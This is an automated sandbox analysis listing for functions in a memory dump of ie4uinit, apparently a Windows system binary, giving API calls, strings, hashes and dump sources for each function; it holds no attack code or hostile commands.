API ID: Local$Security$AllocErrorFreeKernelLastLengthObject$CopyDescriptorSacl
String ID:
API String ID: 3500360645-0
Opcode ID: f484e11bb68007c79833053dbf434390e9548860d72040c734a544c6a9387fbd
Instruction ID: 09a0940af4af2985e3dcbf373014e18f454b90a2032616245a0c661780440239
Opcode Fuzzy Hash: f484e11bb68007c79833053dbf434390e9548860d72040c734a544c6a9387fbd
Instruction Fuzzy Hash: 4B518461B066128AFB218B69DF443FA22A4BF44F94F004434DF0E9664DDF3EEC469390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521955C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 113synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreExW.KERNEL32(?,00007FF6B521827C), ref: 00007FF6B5219586
GetLastError.KERNEL32(?,00007FF6B521827C), ref: 00007FF6B521959C
CloseHandle.KERNEL32(?,00007FF6B521827C), ref: 00007FF6B52195A7
SetLastError.KERNEL32(?,00007FF6B521827C), ref: 00007FF6B52195B3
GetCurrentProcessId.KERNEL32 ref: 00007FF6B521963A
CreateMutexExW.KERNEL32 ref: 00007FF6B5219676
CloseHandle.KERNEL32 ref: 00007FF6B521969C

Strings

x, xrefs: 00007FF6B521964F
internal\sdk\inc\wil\resultmacros.h, xrefs: 00007FF6B52195C3
Local\SM0:%d:%d:%hs, xrefs: 00007FF6B5219645
wil, xrefs: 00007FF6B5219AFE
internal\sdk\inc\wil\resource.h, xrefs: 00007FF6B52197F3

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$CurrentMutexProcessSemaphore
String ID: Local\SM0:%d:%d:%hs$internal\sdk\inc\wil\resource.h$internal\sdk\inc\wil\resultmacros.h$wil$x
API String ID: 656119268-2631734413
Opcode ID: f0a4cdb5c4464e01f5c2d47df41c277b7c8a3f2683eb1d8c4202df3bcb8790b5
Instruction ID: 5f3faf6976aafe6bd45f78c559006b18a26023b38deffd64e819f8dac72446e6
Opcode Fuzzy Hash: f0a4cdb5c4464e01f5c2d47df41c277b7c8a3f2683eb1d8c4202df3bcb8790b5
Instruction Fuzzy Hash: 0A419335B0AA4586E7209F59EE503EA63A0FB88F80F184435DB4D87B5ADF7DE8468740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521458C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B52145C0
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B52145D8
GetModuleHandleW.KERNEL32 ref: 00007FF6B52145F5
LoadStringW.USER32 ref: 00007FF6B521460D
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5214631

Part of subcall function 00007FF6B52144E4: SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B521450E
Part of subcall function 00007FF6B52144E4: FindFirstFileW.KERNEL32 ref: 00007FF6B5214524
Part of subcall function 00007FF6B52144E4: FindNextFileW.KERNEL32 ref: 00007FF6B5214548
Part of subcall function 00007FF6B52144E4: FindClose.KERNEL32 ref: 00007FF6B5214555
Part of subcall function 00007FF6B52144E4: SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B521455E

SHGetValueW.SHLWAPI ref: 00007FF6B5214684
GetModuleHandleW.KERNEL32 ref: 00007FF6B5214690
LoadStringW.USER32 ref: 00007FF6B52146A8
SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B52146C0
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B52146E4

Strings

Software\Microsoft\Windows\CurrentVersion\OemStartMenuData, xrefs: 00007FF6B521467D
DesktopShortcutsFolderName, xrefs: 00007FF6B5214671

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CurrentDirectory$Find$FileFolderHandleLoadModulePathSpecialString$CloseFirstNextValue
String ID: DesktopShortcutsFolderName$Software\Microsoft\Windows\CurrentVersion\OemStartMenuData
API String ID: 2124583704-3001445492
Opcode ID: 1b3faeb098a27806fa8076bed0409add7d04647c96a9845ece77223a3828a706
Instruction ID: ae44b152a69d59b0e9a6c0b7efdf7ff5a52498a5991230281aea6f8aef423d80
Opcode Fuzzy Hash: 1b3faeb098a27806fa8076bed0409add7d04647c96a9845ece77223a3828a706
Instruction Fuzzy Hash: 5A41347170AA8295EB749F28ED543EA2364FB44B44F804436D74D87A9EEF3DDA09C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214D8C Relevance: 19.6, APIs: 13, Instructions: 126fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF6B5214DF6
GetLastError.KERNEL32 ref: 00007FF6B5214E05
GetLastError.KERNEL32 ref: 00007FF6B5214E15
GetLastError.KERNEL32 ref: 00007FF6B5214E25
ReadFile.KERNEL32 ref: 00007FF6B5214E5B
GetLastError.KERNEL32 ref: 00007FF6B5214E69
GetLastError.KERNEL32 ref: 00007FF6B5214E79
GetLastError.KERNEL32 ref: 00007FF6B5214E89
CloseHandle.KERNEL32 ref: 00007FF6B5214EA1
DeleteFileW.KERNEL32 ref: 00007FF6B5214EC9
GetLastError.KERNEL32 ref: 00007FF6B5214ED3
GetLastError.KERNEL32 ref: 00007FF6B5214EE3
GetLastError.KERNEL32 ref: 00007FF6B5214EF3

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$File$CloseCreateDeleteHandleRead
String ID:
API String ID: 2438661856-0
Opcode ID: 4185563944fc082adddc344a4aa7eaae3579df12ee75d4a504b46ee816f78f28
Instruction ID: f9e5d11695c0ddf883b1adbed763c34bcb5132824a07a6e58a2f6b9e74a5bcdb
Opcode Fuzzy Hash: 4185563944fc082adddc344a4aa7eaae3579df12ee75d4a504b46ee816f78f28
Instruction Fuzzy Hash: B9516F21B0AB5689FB20AF69DF847AA6398BF44F50F400134DB4DC669ADF7EFC448650

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522B5FC Relevance: 19.6, APIs: 13, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32 ref: 00007FF6B522B620
#50.IERTUTIL ref: 00007FF6B522B635
GetCurrentProcess.KERNEL32 ref: 00007FF6B522B641
GetCurrentProcess.KERNEL32 ref: 00007FF6B522B64A
DuplicateHandle.KERNEL32 ref: 00007FF6B522B66E
GetLastError.KERNEL32 ref: 00007FF6B522B67C
GetLastError.KERNEL32 ref: 00007FF6B522B690
CloseHandle.KERNEL32 ref: 00007FF6B522B6BA
OpenMutexW.KERNEL32 ref: 00007FF6B522B6CC
GetLastError.KERNEL32 ref: 00007FF6B522B6DA
GetLastError.KERNEL32 ref: 00007FF6B522B6EE
GetLastError.KERNEL32 ref: 00007FF6B522B6FB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CurrentHandleMutexProcess$CloseCreateDuplicateOpen
String ID:
API String ID: 3779884535-0
Opcode ID: 44bc51121d29756bba228feff36d28815b0719f3a6f79427657ec2f07360e4b6
Instruction ID: 99f93bf937f4f7a3902cd237919378bea0820c7d5838e806e7f32f5283f9da89
Opcode Fuzzy Hash: 44bc51121d29756bba228feff36d28815b0719f3a6f79427657ec2f07360e4b6
Instruction Fuzzy Hash: E831A465B1AB428AF7108B6A5E843B632D4AF88F81F084038CB4EC625AEF7DFC454710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5219DB0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

OpenSemaphoreW.KERNEL32 ref: 00007FF6B5219E1F
GetLastError.KERNEL32 ref: 00007FF6B5219E34
CloseHandle.KERNEL32 ref: 00007FF6B5219E93

Strings

_p0, xrefs: 00007FF6B5219E00
wil, xrefs: 00007FF6B5219E25

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseErrorHandleLastOpenSemaphore
String ID: _p0$wil
API String ID: 3419097560-1814513734
Opcode ID: 3e00c7960a8c08b84d6e5a24b0eea78a9ec980e5ccf45dd190318e98b559e43d
Instruction ID: 34456c60063d2efec2b7c9aba2b68357ababfbb94d124716692c5253f2514585
Opcode Fuzzy Hash: 3e00c7960a8c08b84d6e5a24b0eea78a9ec980e5ccf45dd190318e98b559e43d
Instruction Fuzzy Hash: F8616D25A0A65285F7209B2ADE553FA23A1EF88F84F540031DF4DC7B5EDE3DE9418740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5212C20 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 76comlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5215974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD
Part of subcall function 00007FF6B5215974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
Part of subcall function 00007FF6B5215974: PostThreadMessageW.USER32 ref: 00007FF6B5215A39

Part of subcall function 00007FF6B5216638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6B521B2D5), ref: 00007FF6B5216650

GetCurrentProcess.KERNEL32 ref: 00007FF6B5212C4F
SetPriorityClass.KERNEL32 ref: 00007FF6B5212C5D
GetCurrentProcess.KERNEL32 ref: 00007FF6B5212C98
CoCreateInstance.OLE32 ref: 00007FF6B5212CD8
GetCurrentProcess.KERNEL32 ref: 00007FF6B5212D13
SetPriorityClass.KERNEL32 ref: 00007FF6B5212D21
GetModuleHandleW.KERNEL32 ref: 00007FF6B5212D54
GetProcAddress.KERNEL32 ref: 00007FF6B5212D64

Strings

In CmdInitializeHistoryRoaming, xrefs: 00007FF6B5212C2A
kernel32.dll, xrefs: 00007FF6B5212D4D
SetProcessInformation, xrefs: 00007FF6B5212D5D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CurrentProcess$ClassMessageOncePriority$AddressCreateExecuteFormatHandleInitInstanceLocalModulePostProcThreadTime
String ID: In CmdInitializeHistoryRoaming$SetProcessInformation$kernel32.dll
API String ID: 2110875543-2055926704
Opcode ID: d4dd72445047c8036ec1cf4f7e81e349de22f4f48d0f6816f7bf7879d8b5237a
Instruction ID: 2b47f277a7756c9203e8e9a410f01e4a4916f8d93a2d909a82238096090d4758
Opcode Fuzzy Hash: d4dd72445047c8036ec1cf4f7e81e349de22f4f48d0f6816f7bf7879d8b5237a
Instruction Fuzzy Hash: D131FC65A0AA0686EB209B1DEE502E523B1EB88F91F514135DB4DC33BADE3DED49C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522797C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B522763C: CryptStringToBinaryW.CRYPT32 ref: 00007FF6B5227683
Part of subcall function 00007FF6B522763C: CryptStringToBinaryW.CRYPT32 ref: 00007FF6B52276C1

CertOpenStore.CRYPT32 ref: 00007FF6B52279D9
CertCreateCertificateContext.CRYPT32 ref: 00007FF6B52279F7
CertFreeCertificateContext.CRYPT32 ref: 00007FF6B5227A60

Part of subcall function 00007FF6B5227C38: memset.MSVCRT ref: 00007FF6B5227C73
Part of subcall function 00007FF6B5227C38: CertGetCertificateChain.CRYPT32 ref: 00007FF6B5227CAA
Part of subcall function 00007FF6B5227C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF6B5227D0B
Part of subcall function 00007FF6B5227C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF6B5227D38
Part of subcall function 00007FF6B5227C38: CertFreeCertificateChain.CRYPT32 ref: 00007FF6B5227D8C

CertAddCertificateContextToStore.CRYPT32 ref: 00007FF6B5227A3B
GetLastError.KERNEL32 ref: 00007FF6B5227A49
GetLastError.KERNEL32 ref: 00007FF6B5227A68
CertCloseStore.CRYPT32 ref: 00007FF6B5227A81

Part of subcall function 00007FF6B522780C: CertGetIntendedKeyUsage.CRYPT32 ref: 00007FF6B5227842
Part of subcall function 00007FF6B522780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF6B5227871
Part of subcall function 00007FF6B522780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF6B5227899
Part of subcall function 00007FF6B522780C: StrCmpNA.SHLWAPI ref: 00007FF6B52278D1
Part of subcall function 00007FF6B522780C: StrCmpNW.SHLWAPI(?,?,00000000,00000000,?,00007FF6B5227A0D), ref: 00007FF6B522793D

GetLastError.KERNEL32 ref: 00007FF6B5227A89

Strings

Trust, xrefs: 00007FF6B52279BE
status, xrefs: 00007FF6B5227983

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Cert$Certificate$Chain$ContextErrorLastStoreUsage$BinaryCryptEnhancedFreePolicyStringVerify$CloseCreateIntendedOpenmemset
String ID: Trust$status
API String ID: 125674551-3800218552
Opcode ID: 559f0b4a6e79f63e8633198e127aaba42bb0adbcb39e31d22a3241c6a7a8e3fb
Instruction ID: 13228b0d799d38811a0d2c4be7760aefc0022a56e50edf80b7964aba5907e392
Opcode Fuzzy Hash: 559f0b4a6e79f63e8633198e127aaba42bb0adbcb39e31d22a3241c6a7a8e3fb
Instruction Fuzzy Hash: E4318F25F1A7428AFB109B6A9F803F962A4AF44F90F444035DF0DC669AEE7DFD058B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5231084 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNEL32(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B52310AC
#791.IERTUTIL(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B52310C3
#791.IERTUTIL(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B52310D2
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B52310E9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B52310F2
DuplicateHandle.KERNEL32 ref: 00007FF6B523111A
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B523112D
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B5231165
OpenFileMappingW.KERNEL32(?,?,?,?,?,?,?,00007FF6B52307F2,?,?,?,?,00000000,00007FF6B521D62B), ref: 00007FF6B523117C

Strings

Local\windows_ie_global_counters, xrefs: 00007FF6B523109F, 00007FF6B5231170

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #791CurrentErrorFileLastMappingOpenProcess$DuplicateHandle
String ID: Local\windows_ie_global_counters
API String ID: 2235036709-3887093185
Opcode ID: 96ae099d120dd4b312794b8523560f6b56ee7184dda3e47ce1d7480bc7ff1a19
Instruction ID: d7872c4be1d5edb949170ec24fe9855b2ec2c36e8fc4e14656949aa8db794892
Opcode Fuzzy Hash: 96ae099d120dd4b312794b8523560f6b56ee7184dda3e47ce1d7480bc7ff1a19
Instruction Fuzzy Hash: 00212631A1AB458AFB649B19AE442E977E5FF48F80F444439DB8D83759DF3CE8468600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522A810 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60COMMON

Download Yara Rule

APIs

StrCmpICW.SHLWAPI ref: 00007FF6B522A82E
StrCmpICW.SHLWAPI ref: 00007FF6B522A84D

Strings

msn.com, xrefs: 00007FF6B522A8A8
about:tabs, xrefs: 00007FF6B522A824
msn.cn, xrefs: 00007FF6B522A8BD
about:newsfeed, xrefs: 00007FF6B522A843

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID:
String ID: about:newsfeed$about:tabs$msn.cn$msn.com
API String ID: 0-2860905812
Opcode ID: ee785f9d378af5630c1425e899b39de16617f4c831697d1f613dc4b8326d94dc
Instruction ID: 4ec17e05797488af2e9e5fc18e05fda16af9f5a47a9810afc4c4de029bbd6baf
Opcode Fuzzy Hash: ee785f9d378af5630c1425e899b39de16617f4c831697d1f613dc4b8326d94dc
Instruction Fuzzy Hash: E9214F21A2DA4686FB549B19EE443B92360FF84F84F004071EB4DC6A5ADFBDDD05CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52303BC Relevance: 16.6, APIs: 11, Instructions: 94fileCOMMON

Download Yara Rule

APIs

#74.IERTUTIL ref: 00007FF6B52303D9

Part of subcall function 00007FF6B5230204: FindFirstFileExW.KERNEL32 ref: 00007FF6B5230279
Part of subcall function 00007FF6B5230204: GetLastError.KERNEL32 ref: 00007FF6B5230288
Part of subcall function 00007FF6B5230204: FindClose.KERNEL32 ref: 00007FF6B5230392

#81.IERTUTIL ref: 00007FF6B5230419
RemoveDirectoryW.KERNEL32 ref: 00007FF6B5230431
DeleteFileW.KERNEL32 ref: 00007FF6B5230439
CloseHandle.KERNEL32 ref: 00007FF6B5230448
GetLastError.KERNEL32 ref: 00007FF6B5230452
GetLastError.KERNEL32 ref: 00007FF6B523046C
#81.IERTUTIL ref: 00007FF6B523049B
CloseHandle.KERNEL32 ref: 00007FF6B52304B2
SetFileAttributesW.KERNEL32 ref: 00007FF6B52304C4
#78.IERTUTIL ref: 00007FF6B52304DB

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseErrorFileLast$FindHandle$AttributesDeleteDirectoryFirstRemove
String ID:
API String ID: 679420900-0
Opcode ID: 0c6023473af65966e22ec26d8daafbac2e1d9139c3c5d07e50fb88086737b95a
Instruction ID: 03f47fb0de24db967579637f45842c9e88fd575a3286f708e00b690310943d0f
Opcode Fuzzy Hash: 0c6023473af65966e22ec26d8daafbac2e1d9139c3c5d07e50fb88086737b95a
Instruction Fuzzy Hash: 03416821A0B6428AE6759B6DDF842B97390AF44FA0F144630D75EC26DADF3CFD458220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5226FC8 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 224memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

SysAllocString.OLEAUT32 ref: 00007FF6B522706E
SysFreeString.OLEAUT32 ref: 00007FF6B522712C

Strings

&clientkey=, xrefs: 00007FF6B5227081
&mac=, xrefs: 00007FF6B52270AE
https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF6B5226FDD

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$AllocFreeHeapProcess
String ID: &clientkey=$&mac=$https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP
API String ID: 858782919-1362008807
Opcode ID: 5d009a413e85f270e67a567bcbc24dd4421520f91cffdb7136139671b867b777
Instruction ID: 9c2173d653f7ac755df554e8172203cb02430cb28f9e755476745214cdf33783
Opcode Fuzzy Hash: 5d009a413e85f270e67a567bcbc24dd4421520f91cffdb7136139671b867b777
Instruction Fuzzy Hash: 9791A526F2AA5245EB108B6ADD002F923A4BF44F84F180531EF4D9775EDE7EEC058740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5228F64 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 170COMMON

Download Yara Rule

APIs

StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF6B52233B1), ref: 00007FF6B5229048
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF6B52233B1), ref: 00007FF6B52290D4
_wtoi.MSVCRT ref: 00007FF6B52290F3
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF6B52233B1), ref: 00007FF6B5229156
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF6B52233B1), ref: 00007FF6B522916B
StrCmpICW.SHLWAPI(?,?,?,?,?,00007FF6B52233B1), ref: 00007FF6B5229197

Strings

false, xrefs: 00007FF6B522918B
Missing, xrefs: 00007FF6B522903C, 00007FF6B52290C8, 00007FF6B522914A
true, xrefs: 00007FF6B522915F

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: _wtoi
String ID: Missing$false$true
API String ID: 259676474-471191888
Opcode ID: 3e6fb3627816cfa2127f89f5c01441e566d1aa3782fbb513c0e7cb0a988daaec
Instruction ID: d6c275a49c75601a757b4f413075a29ac1bf15f7b1591e95dacf8a4f11c094fe
Opcode Fuzzy Hash: 3e6fb3627816cfa2127f89f5c01441e566d1aa3782fbb513c0e7cb0a988daaec
Instruction Fuzzy Hash: DB71C82661664696FB20DB29DD452FA2361FF44B84F811031DB4DC739AEF3EEA46C740

Uniqueness

Uniqueness Score: -1.00%

